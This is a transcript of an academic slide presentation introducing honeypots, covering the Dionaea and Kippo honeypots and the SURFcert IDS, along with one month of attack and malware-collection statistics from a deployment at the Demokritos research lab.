1 / 16

A short introduction to honeypots

A short introduction to honeypots. Εμμανουήλ Βασιλομανωλάκης Υποψήφιος Διδάκτωρ Telecooperation Group, Technische Universität Darmstadt Center for Advanced Security Research Darmstadt (CASED) Συνεργάτης Εργ. Δικτύων ISLAB, ΙΠΤ, ΔΗΜΟΚΡΙΤΟΣ manolis @cased.de. Outline. Introduction

yale
Download Presentation

A short introduction to honeypots

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. A short introduction to honeypots Εμμανουήλ Βασιλομανωλάκης Υποψήφιος Διδάκτωρ Telecooperation Group, Technische Universität Darmstadt Center for Advanced Security Research Darmstadt (CASED) Συνεργάτης Εργ. Δικτύων ISLAB, ΙΠΤ, ΔΗΜΟΚΡΙΤΟΣ manolis@cased.de

  2. Outline • Introduction • Classifications • Deployment Architectures • Open source vs. nothing • 2 Honeypots • SURFcert IDS & experiences from Demokritos • Future work - ideas Telecooperation Group | CASED

  3. Introduction • Definition: “A security resource who's value lies in being probed, attacked or compromised” • Doesn’t have to be a system: Honeytokens • We want to get compromised! • Certainly not a standalone security mechanism. • Why? • FUN! • No false-positives! • Research: Malware analysis/reverse engineering • Reducing available attack surface/early warning system Telecooperation Group | CASED

  4. Honeypot Classifications • Low interaction: simulate network operations (usually at the tcp/ip stack) • [Medium interaction: simulate network operations(with more “sophisticated” ways)] • High interaction: real systems(e.g., VMs) • Other classifications: • Purpose: Generic, Malware collectors, SSH, etc. • Production – Research (not reallyuseful) Telecooperation Group | CASED

  5. Honeypot Deployment Architectures Telecooperation Group | CASED

  6. Open Source vs. nothing (really!) Telecooperation Group | CASED

  7. Dionaea • Low Interaction honeypot for collecting malware • Nepenthes successor • Basic protocol simulated: SMB (port 445) • Others: HTTP, HTTPS, FTP, TFTP, MSSQL and SIP (VOIP) • Also supports IPv6 and TLS • Malware files: stored locally or/and sent to 3rd party entities (CWSandbox, Norman Sandbox, Anubis, VirusTotal) Telecooperation Group | CASED

  8. Kippo (1/2) • Low interaction SSH honeypot • Features: • Presenting a fake (but “functional”) system to the attacker (resembling a Debian 5.0 installation) • Attacker can download his tools through wget, and we save them for later inspection (cool!) • Session logs are stored in an UML- compatible format for easy replay with original timings (even cooler!) • Easy to install, but hard to get hackers! Telecooperation Group | CASED

  9. SURFcert IDS • An open source (GPLv2) distributed intrusion detection system based on honeypots • Sensors, act as proxies, forwarding network traffic from the monitored network to the system’s center using OpenVPN • Supported Honeypots: Nepenthes, Dionaea, Argos, Kippo • Three parts: • Tunnel – honeypot server • Web – Logging server • Sensors Telecooperation Group | CASED

  10. SURFcert IDS • Also: • Supports p0f for attackers’ OS detection • Statistics, nice web-GUI, sensor status, geographical visualizations, and more… Telecooperation Group | CASED

  11. SURFcert IDS @ Demokritos • Some stats: • 21.000 attacks on 3 different sensors (1 month) • 1500 malware files downloaded • Main target: port 445 • Successfully detected infected systems, inside our network (mostly with a Conficker Worm variant) • Automatic malware analysis can give us valuable informationon Botnets (and their C&C IRC servers) • Possible to find zero-date exploits / new malware (or different variants) Telecooperation Group | CASED

  12. Future Work - Ideas • Features: • Better visualization • Anti-evasion techniques • Cheap & easy mobile sensors:Raspberry Pi • Advertising honeypots • Honeypots: • Mobile honeypots (e.g., Android) • SCADA – Industrial Control Systems (ICS) Attacker scans our system Attacker trying to connect to our “ftp” server Telecooperation Group | CASED

  13. Thank You  Questions? Telecooperation Group | CASED

  14. Backup slides Telecooperation Group | CASED

  15. Useful Links • Interesting stuff: • http://www.islab.demokritos.gr– Many honeypot-related thesesavailable • https://www.enisa.europa.eu/activities/cert/support/proactive-detection/proactive-detection-of-security-incidents-II-honeypots - Report from ENISA regarding honeypots • http://publicids.surfnet.nl:8080/surfnetids/login.php - Demo version of SURFcert IDS • Honeypots: • http://www.honeynet.org – General information on honeypots • http://dionaea.carnivore.it – Dionaea honeypot • http://amunhoney.sourceforge.net – Amun honeypot • http://map.honeynet.org – Honeypots visualization Telecooperation Group | CASED

  16. SURFcert IDS @ Demokritos [outside main firewall] [inside main firewall] Telecooperation Group | CASED

More Related